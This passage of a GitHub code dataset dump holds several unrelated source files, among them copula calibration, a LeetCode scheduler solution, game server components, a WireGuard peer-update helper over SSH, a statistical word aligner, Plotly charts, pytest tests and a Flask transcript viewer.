covarianceData\n\n def optimalNu(self, variates, sigma, covariance):\n dimension, noOfObservations = variates.shape\n sigmaInverse = numpy.linalg.inv(sigma)\n determinant = numpy.linalg.det(sigma)\n nu = 2.0\n argMax = 0.0\n maxValue = float(\"-inf\")\n while nu <= self.maximumNuValue:\n a = gammaln(0.5 * (nu + dimension)) - gammaln(0.5 * nu) - 0.5 * dimension * math.log(nu)\n b = 0.5 * (dimension * math.log(math.pi) + math.log(determinant))\n tCopula = StudentTCopula(covariance, nu)\n value = 0.0\n ld = 0.0\n for j in xrange(noOfObservations):\n variate = numpy.zeros(dimension)\n for i in xrange(dimension):\n variate[i] = t.ppf(variates[i, j], nu)\n ld += math.log(t.pdf(variate[i], nu))\n variateVector = numpy.array(variate)\n value += math.log(1.0 + numpy.dot(variateVector, numpy.dot(sigmaInverse, variateVector)) / nu)\n value = noOfObservations * (a - b) - 0.5 * (nu + dimension) * value - ld\n if value > maxValue:\n maxValue = value\n argMax = nu\n nu += self.delta\n return argMax\n\n # def logLikelihood(self, variate, sigma, nu):\n # dimension = variate.size\n # tVariate = numpy.array([variate[i] for i in xrange(dimension)])\n # observation = numpy.array([tVariate[i] for i in xrange(dimension)])\n # variateVector = numpy.array(observation)\n # sigmaInverse = numpy.linalg.inv(sigma)\n # determinant = numpy.linalg.det(sigma)\n # a = 0.0\n # b = 0.0\n # value = math.log(gamma(0.5 * (nu + dimension)) / gamma(0.5 * nu)) - dimension * math.log(gamma(0.5 * (nu + 1.0)) / gamma(0.5 * nu)) - 0.5 * math.log(determinant)\n # a = math.log(1.0 + numpy.dot(variateVector, numpy.dot(sigmaInverse, variateVector)) / nu)\n # b = 0.0\n # for i in xrange(dimension):\n # b += math.log(1.0 + tVariate[i] * tVariate[i] / nu)\n # value += 0.5 * ((nu + 1.0) * b - (nu + dimension) * a)\n # return value\n","repo_name":"neotrinity/cqf","sub_path":"bcd/copy_calibration.py","file_name":"copy_calibration.py","file_ext":"py","file_size_in_byte":5780,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"3108113367","text":"# Given a char array representing tasks CPU need to do. It contains capital lett\n# ers A to Z where different letters represent different tasks. Tasks could be don\n# e without original order. Each task could be done in one interval. For each inte\n# rval, CPU could finish one task or just be idle. \n# \n# However, there is a non-negative cooling interval n that means between two sa\n# me tasks, there must be at least n intervals that CPU are doing different tasks \n# or just be idle. \n# \n# You need to return the least number of intervals the CPU will take to finish \n# all the given tasks. \n# \n# \n# \n# Example: \n# \n# \n# Input: tasks = [\"A\",\"A\",\"A\",\"B\",\"B\",\"B\"], n = 2\n# Output: 8\n# Explanation: A -> B -> idle -> A -> B -> idle -> A -> B.\n# \n# \n# \n# \n# Note: \n# \n# \n# The number of tasks is in the range [1, 10000]. \n# The integer n is in the range [0, 100]. 
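\n# \n# Note: the answer also has the known closed form max(len(tasks), (max_count - 1) * (n + 1) + k), \n# where k is the number of task types attaining max_count; the heap simulation below computes \n# the same value interval by interval.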
\n# \n# Related Topics Array Greedy Queue\nfrom typing import List\n\n# leetcode submit region begin(Prohibit modification and deletion)\nfrom collections import Counter\nimport heapq as h\n\n\nclass Solution:\n def leastInterval(self, tasks: List[str], n: int) -> int:\n tc = Counter(tasks)\n task_heap = [(-cnt, task) for task, cnt in tc.items()]\n h.heapify(task_heap)\n\n intervals = 0\n cooling_tasks_heap = []\n while len(task_heap) > 0 or len(cooling_tasks_heap) > 0:\n if len(task_heap) > 0:\n neg_cnt, task = h.heappop(task_heap)\n if neg_cnt < -1:\n h.heappush(cooling_tasks_heap, (intervals, neg_cnt + 1, task))\n while len(cooling_tasks_heap) > 0:\n last_run_interval, neg_cnt, task = cooling_tasks_heap[0]\n if last_run_interval + n <= intervals:\n h.heappop(cooling_tasks_heap)\n h.heappush(task_heap, (neg_cnt, task))\n else:\n break\n intervals += 1\n return intervals\n\n\n# leetcode submit region end(Prohibit modification and deletion)\n\ndef test():\n ts = [('AAABBB', 2, 8)]\n s = Solution()\n for tasks, n, ans in ts:\n actual = s.leastInterval(tasks, n)\n print(tasks, n, ans, actual)\n assert actual == ans\n","repo_name":"sunilnandihalli/leetcode","sub_path":"editor/en/[621]Task Scheduler.py","file_name":"[621]Task Scheduler.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37023385801","text":"#Embedded file name: e:\\jenkins\\workspace\\client_SERENITY\\branches\\release\\SERENITY\\packages\\spacecomponents\\server\\components\\activate.py\r\nimport logging\r\nfrom carbon.common.lib import const\r\nfrom eve.common.script.mgt.appLogConst import eventSpaceComponentBeginActivating, eventSpaceComponentActivated\r\nimport datetimeutils\r\nfrom eveexceptions import UserError\r\nfrom spacecomponents.common.componentConst import ACTIVATE_CLASS\r\nfrom spacecomponents.common.components.component import Component\r\nfrom spacecomponents.server.messages import MSG_ON_ACTIVE\r\nfrom timedilation import SimTimeToWallclockTime, WallclockTimeToSimTime\r\nlogger = logging.getLogger(__name__)\r\n\r\nclass Activate(Component):\r\n\r\n def __init__(self, itemID, typeID, attributes, componentRegistry):\r\n Component.__init__(self, itemID, typeID, attributes, componentRegistry)\r\n self.eventLogger = self.componentRegistry.eventLogger\r\n self.GetWallclockTime = componentRegistry.asyncFuncs.GetWallclockTime\r\n self.GetSimTime = componentRegistry.asyncFuncs.GetSimTime\r\n self.SleepSim = componentRegistry.asyncFuncs.SleepSim\r\n self.TimeDiffInMs = componentRegistry.asyncFuncs.TimeDiffInMs\r\n self.UThreadNew = componentRegistry.asyncFuncs.UThreadNew\r\n self.isActive = False\r\n self.activeTimestamp = None\r\n componentRegistry.SubscribeToItemMessage(self.itemID, 'OnAddedToSpace', self.OnAddedToSpace)\r\n componentRegistry.SubscribeToItemMessage(self.itemID, 'OnRemovedFromSpace', self.OnRemovedFromSpace)\r\n\r\n def IsActive(self):\r\n return self.isActive\r\n\r\n def OnAddedToSpace(self, ballpark, spaceComponentDB):\r\n logger.debug('Activate.OnAddedToSpace %d', self.itemID)\r\n state = spaceComponentDB.ActivateStates_Select(self.itemID)\r\n if len(state) == 0:\r\n self.isActive = False\r\n self.activeTimestamp = self.GetSimTime() + self.attributes.durationSeconds * const.SEC\r\n UpdateSlimItemFromComponent(self, ballpark)\r\n PersistToDB(self, spaceComponentDB)\r\n self.UThreadNew(BeginDelayedActivation, self, spaceComponentDB, ballpark)\r\n ballpark.dbLog.LogItemGenericEvent(None, 
eventSpaceComponentBeginActivating, self.itemID, referenceID=ballpark.solarsystemID, int_1=self.typeID, int_2=self.attributes.durationSeconds)\r\n else:\r\n state = state[0]\r\n self.isActive = state.activated\r\n if state.activeTimestamp is None:\r\n self.activeTimestamp = None\r\n UpdateSlimItemFromComponent(self, ballpark)\r\n if self.isActive:\r\n self.SendMessage(MSG_ON_ACTIVE, ballpark)\r\n else:\r\n simTimeNow = self.GetSimTime()\r\n wallclockTimeNow = self.GetWallclockTime()\r\n self.activeTimestamp = WallclockTimeToSimTime(state.activeTimestamp, wallclockTimeNow, simTimeNow)\r\n if self.activeTimestamp < self.GetSimTime():\r\n BecomeActive(self, spaceComponentDB, ballpark)\r\n else:\r\n UpdateSlimItemFromComponent(self, ballpark)\r\n self.UThreadNew(BeginDelayedActivation, self, spaceComponentDB, ballpark)\r\n\r\n def OnRemovedFromSpace(self, ballpark, spaceComponentDB):\r\n logger.debug('Activate.OnRemovedFromSpace %d', self.itemID)\r\n self.isActive = False\r\n self.activeTimestamp = None\r\n spaceComponentDB.ActivateStates_Delete(self.itemID)\r\n\r\n def HandleSlashCommand(self, action, ballpark, spaceComponentDB):\r\n logger.debug('Activate.HandleSlashCommand %d %s', self.itemID, action)\r\n if action[0].lower() == 'makeactive':\r\n if not self.isActive:\r\n BecomeActive(self, spaceComponentDB, ballpark)\r\n else:\r\n raise UserError('SlashError', {'reason': 'Component is already active'})\r\n else:\r\n raise UserError('SlashError', {'reason': 'Usage: /spacecomponent activate ITEMID makeactive'})\r\n\r\n def GetDebugText(self):\r\n if self.isActive:\r\n return 'Active'\r\n else:\r\n simTimeNow = self.GetSimTime()\r\n wallclockTimeNow = self.GetWallclockTime()\r\n activeTimestampWallclock = SimTimeToWallclockTime(self.activeTimestamp, simTimeNow, wallclockTimeNow)\r\n timeStr = datetimeutils.any_to_datetime(activeTimestampWallclock).strftime('%Y-%m-%d %H:%M:%S')\r\n return 'Will activate at %s (subject to time-dilation)' % (timeStr,)\r\n\r\n @staticmethod\r\n def GetEspStateInfo(itemID, dbspacecomponent, espWriter):\r\n state = dbspacecomponent.ActivateStates_Select(itemID)\r\n if len(state):\r\n state = state[0]\r\n if state.activated:\r\n return 'Activated'\r\n if state.activeTimestamp:\r\n return 'Will become active at: %s (subject to time-dilation and solar-system being loaded)' % datetimeutils.any_to_datetime(state.activeTimestamp).strftime('%Y-%m-%d %H:%M:%S')\r\n else:\r\n return 'No info in DB'\r\n\r\n @staticmethod\r\n def GetEspTypeInfo(typeID, spaceComponentStaticData):\r\n attributes = spaceComponentStaticData.GetAttributes(typeID, ACTIVATE_CLASS)\r\n attributeStrings = []\r\n duration = attributes.durationSeconds\r\n attributeStrings.append('Activation time: %d seconds' % duration)\r\n infoString = '
'.join(attributeStrings)\r\n return infoString\r\n\r\n\r\ndef UpdateSlimItemFromComponent(component, ballpark):\r\n logger.debug('Activate.UpdateSlimItemFromComponent %d %d %s', component.itemID, component.isActive, component.activeTimestamp)\r\n ballpark.UpdateSlimItemField(component.itemID, 'component_activate', (component.isActive, component.activeTimestamp))\r\n\r\n\r\ndef BecomeActive(component, spaceComponentDB, ballpark):\r\n logger.debug('Activate.BecomeActive %d', component.itemID)\r\n component.isActive = True\r\n component.activeTimestamp = None\r\n PersistToDB(component, spaceComponentDB)\r\n UpdateSlimItemFromComponent(component, ballpark)\r\n component.SendMessage(MSG_ON_ACTIVE, ballpark)\r\n item = ballpark.inventory2.GetItem(component.itemID)\r\n component.eventLogger.LogBecomeActive(item)\r\n ballpark.dbLog.LogItemGenericEvent(None, eventSpaceComponentActivated, component.itemID, referenceID=ballpark.solarsystemID, int_1=component.typeID)\r\n\r\n\r\ndef BeginDelayedActivation(component, spaceComponentDB, ballpark):\r\n now = component.GetSimTime()\r\n activeTimestamp = component.activeTimestamp\r\n logger.debug('Activate.BeginDelayedActivation %d %s', component.itemID, activeTimestamp)\r\n delay = component.TimeDiffInMs(now, activeTimestamp)\r\n if delay > 0:\r\n component.SleepSim(delay)\r\n if activeTimestamp != component.activeTimestamp:\r\n return\r\n BecomeActive(component, spaceComponentDB, ballpark)\r\n\r\n\r\ndef PersistToDB(component, spaceComponentDB):\r\n if component.activeTimestamp is None:\r\n activeTimestampWallclock = None\r\n else:\r\n simTimeNow = component.GetSimTime()\r\n wallclockTimeNow = component.GetWallclockTime()\r\n activeTimestampWallclock = SimTimeToWallclockTime(component.activeTimestamp, simTimeNow, wallclockTimeNow)\r\n logger.debug('Activate.PersistToDB %d, %d, %s', component.itemID, component.isActive, activeTimestampWallclock)\r\n spaceComponentDB.ActivateStates_Update(component.itemID, component.isActive, activeTimestampWallclock)\r\n\r\n\r\ndef HandleSlashCommand(itemID, action, ballpark, componentRegistry, spaceComponentDB):\r\n component = componentRegistry.GetComponentsByItemID(itemID)[ACTIVATE_CLASS]\r\n component.HandleSlashCommand(action, ballpark, spaceComponentDB)\r\n","repo_name":"connoryang/dec-eve-serenity","sub_path":"client/spacecomponents/server/components/activate.py","file_name":"activate.py","file_ext":"py","file_size_in_byte":7776,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"38656307350","text":"import paramiko\nimport io\n\nfrom wgpt import models\n\n\ndef send_ssh_command(command, known_host, pubkey, ip):\n if command == \"add\":\n ssh_command = \"sudo wg set wg0 peer {} allowed-ips {}/32\".format(pubkey, ip)\n elif command == \"remove\":\n ssh_command = \"sudo wg set wg0 peer {} remove allowed-ips {}/32\".format(pubkey, ip)\n\n conf = models.ConfigOptions.query.all()[0]\n\n print(ssh_command)\n\n ssh = paramiko.SSHClient()\n hostkey = paramiko.hostkeys.HostKeyEntry.from_line(known_host)\n\n ssh.get_host_keys().add(hostkey.hostnames[0], hostkey.key.get_name(), hostkey.key)\n\n try:\n ssh.connect(hostkey.hostnames[0],\n username='wgpt',\n pkey=paramiko.RSAKey(file_obj=io.StringIO(conf.ssh_privkey)))\n except paramiko.AuthenticationException:\n return False \n \n try:\n stdin, stdout, stderr = ssh.exec_command(ssh_command)\n except paramiko.SSHException:\n return False \n\n data = stderr.readlines()\n for line in data:\n print(line.strip())\n 
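# Note: stderr from the wg command is printed above but never parsed, so the True below only\n # means the command was dispatched, not that WireGuard accepted it.\n 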
ssh.close()\n return True\n","repo_name":"keezel-co/portunus_api","sub_path":"wgpt/wg_ssh_update.py","file_name":"wg_ssh_update.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"14202278532","text":"from selenium import webdriver\nimport os\nimport codecs\n\nfile1 = open('url.csv', 'r')\nLines = file1.readlines()\n\nfor line in Lines:\n if 'https' in line.strip():\n url = line.strip()\n url = url.replace('\"','')\n print(url)\n split_url = url.split(\"postcodezip/\", 1)\n substring = split_url[1]\n print(substring)\n driver = webdriver.Chrome('./chromedriver')\n driver.implicitly_wait(0.5)\n driver.maximize_window()\n driver.get(url)\n pageSource = driver.page_source\n # get file path to save page\n completeName = os.path.join(\"C:\\\\Users\\\\CyrusSmith\\\\Desktop\\\\postcodezip\", substring)\n driver.implicitly_wait(2.0)\n file_object = codecs.open(completeName, \"w\", \"utf-8\")\n html = driver.page_source\n file_object.write(html)\n driver.implicitly_wait(0.5)\ndriver.close()","repo_name":"CyrusTheVirusSmith/website-page-translation","sub_path":"urlread.py","file_name":"urlread.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41003359246","text":"import os\nimport logging.config\n\n__all__ = ['logger']\n\nDEBUG = os.environ.get('DEBUG', '').lower() in ['true', '1']\n\nCONFIG = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'default': {\n 'format': '[%(levelname)s] %(asctime)s %(name)s: %(message)s'\n },\n 'zelig': {\n 'format': '[%(levelname)s] %(message)s'\n }\n },\n 'handlers': {\n 'default': {\n 'class': 'logging.StreamHandler',\n 'formatter': 'default',\n },\n 'zelig': {\n 'class': 'logging.StreamHandler',\n 'formatter': 'zelig',\n },\n },\n 'loggers': {\n 'zelig': {\n 'level': logging.DEBUG if DEBUG else logging.INFO,\n 'handlers': ['zelig'],\n 'propagate': False\n },\n },\n 'root': {\n 'handlers': ['default'],\n 'level': logging.WARNING,\n },\n}\n\nlogging.config.dictConfig(CONFIG)\n\nlogger = logging.getLogger('zelig')\n","repo_name":"acceradev/zelig","sub_path":"zelig/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5673905309","text":"import pandas as pd\n\nexcel_file_name = 'testExcel.xlsx'\n\ndf = pd.read_excel(excel_file_name, sheet_names='ACUCOrganizationDonationVerific')\ncomplete_df = df[df['Entry_Status'] == 'Complete']\nnum_rows = len(complete_df.index)\ncomplete_df = complete_df.fillna(0) \n# df = df.replace('nan', '')\n\n# print (df)\n# print (complete_df.head(5))\n\nfor index, row in complete_df.head(1).iterrows():\n # access data using column names\n first_row = '###' + '. 
' + row['OrganizationNameInEnglish'] + '_' + row['机构名称']\n # print(index, first_row)\n row_part = row.iloc[12:58] \n for i , v in row_part.iteritems():\n \tprint(i)\n \tprint(v)\n\n# print (complete_df.dtypes)\n","repo_name":"dailiang18bb/2020-ACUC-COVID19","sub_path":"readExcel.py","file_name":"readExcel.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"44694060682","text":"import nltk\nimport A\nfrom nltk.align import AlignedSent\nfrom collections import defaultdict\n\nclass BerkeleyAligner():\n\n def __init__(self, align_sents, num_iter):\n self.t, self.q = self.train(align_sents, num_iter)\n\n # TODO: Computes the alignments for align_sent, using this model's parameters. Return\n # an AlignedSent object, with the sentence pair and the alignments computed.\n def align(self, align_sent):\n \n alignment = []\n \n germ_sent = [None] + align_sent.words\n en_sent = [None] + align_sent.mots\n\n l = len(germ_sent)\n m = len(en_sent)\n\n i = 0\n for word in germ_sent:\n\n #initialize max_prob to null alignment (i.e. target = None, j = 0)\n max_prob = ((self.t['german'][word][None][0]*self.q['german'][(i, l, m)][0][0]) +\n self.t['english'][None][word][0]*self.q['english'][(0, m, l)][i][0]) / float(2) \n\n winner = None\n \n j=0\n for target in en_sent:\n curr_prob = ((self.t['german'][word][target][0]*self.q['german'][(i, l, m)][j][0]) +\n self.t['english'][target][word][0]*self.q['english'][(j, m, l)][i][0]) / float(2)\n \n\n if curr_prob > max_prob:\n max_prob = curr_prob\n winner = j\n \n j +=1 \n \n #add alignment if it is not aligned to NULL\n if winner != None and i != 0:\n alignment.append((i-1, winner-1))\n \n i += 1\n \n \n return AlignedSent(align_sent.words, align_sent.mots, alignment)\n\n # TODO: Implement the EM algorithm. num_iters is the number of iterations. 
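(Both translation directions are trained jointly and their expected counts are\n # averaged, in the spirit of the Berkeley aligner.)\n # 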
Returns the \n # translation and distortion parameters as a tuple.\n def train(self, aligned_sents, num_iters):\n \n t = {}\n q = {}\n \n t['german']= {}\n t['english'] = {}\n q['german'] = {}\n q['english'] = {}\n \n\n\n #initialize parameters uniformly\n for sentence in aligned_sents:\n \n en_sent = [None] + sentence.mots\n germ_sent = [None] + sentence.words\n\n i = 0\n l = len(en_sent)\n m = len(germ_sent)\n \n \n for word in en_sent:\n if not t['english'].has_key(word):\n t['english'][word] = {}\n if not q['english'].has_key((i, l, m)):\n q['english'][(i, l, m)] = {}\n \n j = 0\n for target in germ_sent:\n if not t['english'][word].has_key(target):\n \n t['english'][word][target] = []\n \n #will be t(target|word)\n t['english'][word][target].append(0)\n \n #initialize q values to 1/l\n if not q['english'][(i, l, m)].has_key(j):\n q['english'][(i, l, m)][j] = []\n q['english'][(i, l, m)][j].append(float(1)/l)\n\n\n j += 1\n\n i += 1\n \n\n\n\n\n i = 0\n l = len(germ_sent)\n m = len(en_sent)\n for word in germ_sent:\n \n if not t['german'].has_key(word):\n t['german'][word] = {}\n if not q['german'].has_key((i, l, m)):\n q['german'][(i, l, m)] = {}\n\n j = 0 \n for target in en_sent:\n if not t['german'][word].has_key(target):\n t['german'][word][target] = []\n\n #will be t(target|word)\n t['german'][word][target].append(0)\n \n\n #initalize q values to 1/l\n if not q['german'][(i, l, m)].has_key(j):\n q['german'][(i, l, m)][j] = []\n q['german'][(i, l, m)][j].append(float(1)/l)\n \n j += 1\n \n i += 1\n\n\n \n #initialize t values uniformly\n for language in t:\n for word in t[language]:\n count = len(t[language][word])\n for target in t[language][word]:\n t[language][word][target][0] = float(1)/count\n \n \n\n#iterate num_iter times:\n for x in range(0, num_iters): \n \n for sentence in aligned_sents:\n\n en_sent = [None] + sentence.mots\n germ_sent = [None] + sentence.words\n \n\n \n #english to german counts\n i = 0\n l = len(en_sent)\n m = len(germ_sent)\n for word in en_sent:\n \n #initialize the word's count if first treatment of word\n if not t['english'][word].has_key('word_sum'):\n t['english'][word]['word_sum'] = 0\n \n #initialize (i, l, m) count if first treatment of indices/parameters\n if not q['english'][(i, l, m)].has_key('ilm_sum'):\n q['english'][(i, l, m)]['ilm_sum'] = 0\n\n #used for normalization over sentence\n wordtargsum = 0\n targwordsum = 0\n\n j = 0\n for target in germ_sent:\n reverse_params = (j, m, l)\n wordtargsum += t['english'][word][target][0]*q['english'][(i, l, m)][j][0]\n targwordsum += t['german'][target][word][0]*q['german'][reverse_params][i][0]\n \n #initalize word/target t count to 0 if first treatment of word:target pair\n if len(t['english'][word][target]) < 2:\n t['english'][word][target].append(0)\n \n #initalize (j | i, l, m) count to 0 if first reatment\n if len(q['english'][(i, l, m)][j]) < 2:\n q['english'][(i, l, m)][j].append(0) \n \n j += 1\n \n j = 0\n for target in germ_sent:\n reverse_params = (j, m, l)\n non_normalized1 = (t['english'][word][target][0]*q['english'][(i, l, m)][j][0])\n non_normalized2 = t['german'][target][word][0]*q['german'][reverse_params][i][0]\n \n #normalization over the sentece\n delta1 = non_normalized1/float(wordtargsum)\n delta2 = non_normalized2/float(targwordsum)\n delta = (delta1 + delta2)/2.0\n \n t['english'][word][target][1] += delta \n t['english'][word]['word_sum'] += delta \n q['english'][(i, l, m)][j][1] += delta\n q['english'][(i, l, m)]['ilm_sum'] += delta\n \n j += 1\n\n i += 1\n\n #german 
to english counts\n i = 0\n l = len(germ_sent)\n m = len(en_sent)\n for word in germ_sent:\n\n #initialize the word's count if first treatment of word\n if not t['german'][word].has_key('word_sum'):\n t['german'][word]['word_sum'] = 0\n \n #initialize (i, l, m) count if first treatment of indices/parameters\n if not q['german'][(i, l, m)].has_key('ilm_sum'):\n q['german'][(i, l, m)]['ilm_sum'] = 0\n \n\n #used for normalization over sentence\n wordtargsum = 0\n targwordsum = 0\n\n j=0\n for target in en_sent:\n reverse_params = (j, m, l)\n wordtargsum += t['german'][word][target][0]*q['german'][(i, l, m)][j][0]\n targwordsum += t['english'][target][word][0]*q['english'][reverse_params][i][0]\n \n #initalize word/target count to 0 if first treatment of word:target pair\n if len(t['german'][word][target]) < 2:\n t['german'][word][target].append(0)\n \n #initialize (j| i, l, m) count to 0 if first treatment\n if len(q['german'][(i, l, m)][j]) < 2:\n q['german'][(i, l, m)][j].append(0)\n \n j += 1\n \n j = 0\n for target in en_sent:\n reverse_params = (j, m, l)\n non_normalized1 = t['german'][word][target][0]*q['german'][(i, l, m)][j][0]\n non_normalized2 = t['english'][target][word][0]*q['english'][reverse_params][i][0]\n \n #normalization over the sentece\n delta1 = non_normalized1/float(wordtargsum)\n delta2 = non_normalized2/float(targwordsum)\n delta = (delta1 + delta2) / 2.0\n\n t['german'][word][target][1] += delta \n t['german'][word]['word_sum'] += delta\n q['german'][(i, l, m)][j][1] += delta\n q['german'][(i, l, m)]['ilm_sum'] += delta\n \n j += 1\n \n \n i += 1\n \n #recalculate parameters--normalization over the word\n \n #english\n for word in t['english']:\n for target in t['english'][word]:\n if not target == 'word_sum':\n \n t['english'][word][target][0] = t['english'][word][target][1]/float(t['english'][word]['word_sum'])\n \n \n\n for ilm in q['english']: \n for j in q['english'][ilm]:\n if not j == 'ilm_sum':\n q['english'][ilm][j][0] = q['english'][ilm][j][1]/float(q['english'][ilm]['ilm_sum']) \n \n #german\n for word in t['german']:\n for target in t['german'][word]:\n if not target == 'word_sum':\n t['german'][word][target][0] = t['german'][word][target][1]/float(t['german'][word]['word_sum'])\n\n \n\n for ilm in q['german']: \n for j in q['german'][ilm]:\n if not j == 'ilm_sum':\n q['german'][ilm][j][0] = q['german'][ilm][j][1]/float(q['german'][ilm]['ilm_sum'])\n \n \n \n\n\n \n return (t,q)\n\ndef main(aligned_sents):\n ba = BerkeleyAligner(aligned_sents, 10)\n A.save_model_output(aligned_sents, ba, \"ba.txt\")\n avg_aer = A.compute_avg_aer(aligned_sents, ba, 50)\n\n print ('Berkeley Aligner')\n print ('---------------------------')\n print('Average AER: {0:.3f}\\n'.format(avg_aer))\n","repo_name":"adamsachs/NLP","sub_path":"MachineTranslation/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":11732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"69813135204","text":"import plotly.express as px\nimport plotly.graph_objects as go\nfrom controller import local_to_dataframes as ltd\nfrom controller import consulta_controller as conc\n\ndef update_choropleth_world(tipo=1, anoini=2021, mesini='Mayo', anofin=2021, mesfin='Mayo', dpt=None):\n\n if anoini is None:\n anoini = 2017\n if mesini is None:\n mesini = 'Enero'\n if anofin is None:\n anofin = 2021\n if mesfin is None:\n mesfin = 'Diciembre' \n\n dataframes = conc.loc_grouped(anoini, mesini, anofin, mesfin)\n\n if tipo<=3:\n dff = dataframes[tipo 
- 1]\n\n    fig = go.Figure(data=go.Choropleth(\n        locations=dff['País'],\n        z=dff['Valor FOB dólares de la mercancía'],\n        text=dff['País'],\n        colorscale='Blues',\n        autocolorscale=False,\n        reversescale=False,\n        marker_line_color='darkgray',\n        marker_line_width=0.5,\n        colorbar_tickprefix='$',\n        # colorbar_title = 'GDP<br>
Billions US$',\n ))\n\n fig.update_geos(projection_type=\"natural earth\")\n fig.update_layout(height=480, margin={\"r\":0,\"t\":10,\"l\":0,\"b\":0})\n\n return fig\n\ndef update_heatmap(tipo=1, anoini=2021, mesini='Mayo', anofin=2021, mesfin='Mayo'):\n col_x = 'Código país destino'\n col_y = 'Descriptiva - SCN - NUEVA BASE 2015'\n col_z = 'Total valor FOB doláres de la posición'\n n_rows = 30\n n_cols = 20\n\n df_exports, df_imports = ltd.cargar_dataframes_export(anoini, mesini, anofin, mesfin)\n\n mini_df = df_exports.groupby([col_x, col_y])[[col_z]].sum().unstack(level=-1)\n #flatten columns, resultan en 2 niveles al hacer unstack\n mini_df.columns = [y for x, y in mini_df.columns.values]\n\n top_columns = mini_df.sum().sort_values(ascending=False).head(n_cols).index\n top_rows = df_exports.groupby(col_x)[col_z].sum().sort_values(\n ascending=False).head(n_rows).index\n\n #Labels deben cambiar al definir los inputs\n fig = px.imshow(\n mini_df[top_columns].loc[top_rows],\n labels=dict(x=\"Producto\", y=\"País\", color=\"Valor FOB\"),\n )\n\n axis_template = dict(\n linecolor='black', showticklabels=False,\n ticks=''\n )\n\n fig.update_layout(\n xaxis=axis_template, )\n\n return fig","repo_name":"laurapulidodiaz/RelextAppRepo","sub_path":"controller/update_graph_controller.py","file_name":"update_graph_controller.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35112676201","text":"import pytest\n\nfrom aiohttp import ClientResponseError\nfrom core.multitable_api.entities import DepartmentEntity\nfrom core.multitable_api.exceptions import DepartmentEntityNotFound\nfrom infrastructure.repositories.multitable_api.repository import MultitableUniversityApi\n\n\n@pytest.fixture()\ndef department_item() -> DepartmentEntity:\n return DepartmentEntity(name=\"Вычислительной техники\", id=1618258474887, faculty=1618258396481)\n\n\n@pytest.mark.parametrize(\n \"responses\",\n (\n [\n {\"name\": \"Вычислительной техники\", \"id\": 1618258474887, \"faculty\": 1618258396481},\n {\"name\": \"Архитектуры\", \"id\": 1618258568955, \"faculty\": 1618258419920},\n {\"name\": \"Гидравлики\", \"id\": 1618258575976, \"faculty\": 1618258419920},\n ],\n [],\n ),\n)\n@pytest.mark.asyncio\nasync def test_get_list_departments(repository: MultitableUniversityApi, responses, mock_request_returned_value):\n mock_request_returned_value(repository, responses)\n result = await repository.departments_get()\n result_dto = [DepartmentEntity(**row) for row in responses]\n assert result == result_dto\n\n\n@pytest.mark.asyncio\nasync def test_get_department(repository: MultitableUniversityApi, department_item, mock_request_returned_value):\n mock_request_returned_value(repository, department_item.dict())\n result = await repository.department_get(identifier=department_item.id)\n assert result == department_item\n\n\n@pytest.mark.parametrize(\"status\", (404, 500))\n@pytest.mark.asyncio\nasync def test_get_department_error(repository: MultitableUniversityApi, mock_request_returned_value, status):\n mock_request_returned_value(repository, status=status, answer=False)\n with pytest.raises(DepartmentEntityNotFound):\n await repository.department_get(identifier=1)\n\n\n@pytest.mark.asyncio\nasync def test_create_department(repository: MultitableUniversityApi, department_item, mock_request_returned_value):\n mock_request_returned_value(repository, department_item.dict())\n new = await repository.department_create(\n 
DepartmentEntity(name=department_item.name, faculty=department_item.faculty)\n )\n assert new == department_item\n\n\n@pytest.mark.asyncio\nasync def test_create_faculty_error(repository: MultitableUniversityApi, department_item, mock_request_returned_value):\n mock_request_returned_value(repository, status=500, answer=False)\n with pytest.raises(ClientResponseError):\n await repository.department_create(department_item)\n\n\n@pytest.mark.asyncio\nasync def test_update_faculty(repository: MultitableUniversityApi, department_item, mock_request_returned_value):\n mock_request_returned_value(repository, answer=False)\n department_item.id = \"1\"\n updated = await repository.department_update(department_item)\n assert updated == department_item\n","repo_name":"maintainer64/univ_synced","sub_path":"infrastructure/repositories/multitable_api/tests/test_departments.py","file_name":"test_departments.py","file_ext":"py","file_size_in_byte":2887,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"36682382657","text":"from flask import render_template, flash, redirect\nfrom app import app\nfrom app.forms import YoutubeForm\nfrom youtube_transcript_api import YouTubeTranscriptApi\n\ndef extract_lines(data):\n return [a['text'] for a in data]\n \n\n@app.route('/',methods=['GET', 'POST'])\n@app.route('/index',methods=['GET', 'POST'])\ndef index():\n utterances = [\"Sentence 1\",\"Sentence 2\",\"Sentence 3\"]\n form = YoutubeForm()\n default_val = 'I0mxnyp2kBw'\n trv = YouTubeTranscriptApi.get_transcript(default_val)\n utterances = extract_lines(trv)\n if form.validate_on_submit():\n vidId = form.yt_url.data\n trv = YouTubeTranscriptApi.get_transcript(vidId)\n utterances = extract_lines(trv)\n return render_template('index.html',utterances=utterances,form=form,vidId=vidId)\n return render_template('index.html',utterances=utterances,form=form,vidId='I0mxnyp2kBw')\n","repo_name":"KamilLegault/axion-ai","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9670441090","text":"from __future__ import annotations\nimport asyncio\nimport 